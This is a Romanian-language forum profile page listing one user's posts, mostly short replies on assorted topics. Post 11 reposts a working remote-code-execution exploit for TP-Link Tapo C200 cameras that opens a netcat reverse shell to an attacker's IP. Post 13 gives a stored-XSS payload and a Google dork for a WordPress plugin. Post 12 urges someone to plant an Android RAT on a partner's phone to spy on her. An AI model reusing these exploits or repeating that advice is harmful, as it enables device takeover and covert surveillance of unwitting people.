Jump to content

GabrielRo

Active Members
  • Posts

    82
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by GabrielRo

  1. Numai face spam topic..
  2. Bro e din 2016 topicul...
  3. Salut, nu ma pricep la Seo Dar îți voi lăsa un forum, poate vei găsi răspunsul acolo. https://www.blackhatworld.com/
  4. De ce as plăti pentru niște follows Bots and likes când exista addmefast. 😁
  5. a ok.
  6. Daca te uiti mai atent, a scris corect 192.168.1.1, nici de cum 192.168.1
  7. Dacă folosești IP ( vpn) de Olanda, cum ai vrea sa.ti scrie YouTube Ro.
  8. Fenomenul a apărut în urmă cu doi ani pe rețeaua Reddit, când un utilizator, cunoscut sub numele de ”deepfakes”, a făcut astfel de video-uri trucate, folosindu-se de chipurile unor actori celebri. Prima ”victimă” politică a acestei tehnologii a fost chiar fostul președinte Barack Obama. Recent, și președinta Republicii Moldova, Maia Sandu, a anunțat că a fost victima unui Deepfake.
  9. https://imgur.com/yw1Yi3H Raportat.
      • 1
      • Like
  10. Felicitări! 👏
  11. # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = 1337 REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) if len(sys.argv) < 3: print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>") exit() victim = sys.argv[1] attacker = sys.argv[2] print("[+] Listening on %d" % PORT) t = threading.Thread(target=os.system, args=(NC_COMMAND,)) t.start() print("[+] Serving payload to %s\n" % victim) url = "https://" + victim + ":443/" json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} requests.post(url, json=json, verify=False) Source
  12. Poți fi chiar tu detectivul, îți faci un cont fake cu niște poze luate de pe pinterest ii dai add me friends de pe acel cont creat de tine, și începi sa vorbești cu ea și vezi pana unde duce conversația voastră, sau ii plasezi la ea în telefon un server de android rat. Vezi tutoriale youtube AndroRat.
  13. # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://profiles.wordpress.org/3dady/ # Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.0.1 # CVE : N/A # 1. Technical Description: The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady). c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text): " autofocus onfocus=alert(/XSS/)> d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed. Note: This change will be permanent until you modify the edited fields. Source: https://www.exploit-db.com/exploits/51021
      • 1
      • Upvote
  14. Mulțumesc, succes și ție.
  15. Va salut, imi puteti spune va rog daca este clean acest exe, si nu are nimic ascuns in acel exe.. Va multumesc! https://www.virustotal.com/gui/file/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d https://www.hybrid-analysis.com/sample/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d
  16. Baaa. 😅
  17. Asa este, totul ce se găsește aici public, găsești și acolo.. surse bubuite de Botnet IRC Rxbot, de la programe scrise în Visual Basic Dos Attack.
  18. Sunt vaccinat, si ma voi mai vaccina daca trebuie. Si nu bag in seama ce zice șoșoacă.
  19. https://pasteboard.co/MTYkd9IZ1lxD.jpg 🌡😂
  20. GabrielRo

    UstupidMF

  21. Nu l-am instalat inca, urmeaza sa il instalez.
  22. Bro este din 2019 topicul. 🙈😅
×
×
  • Create New...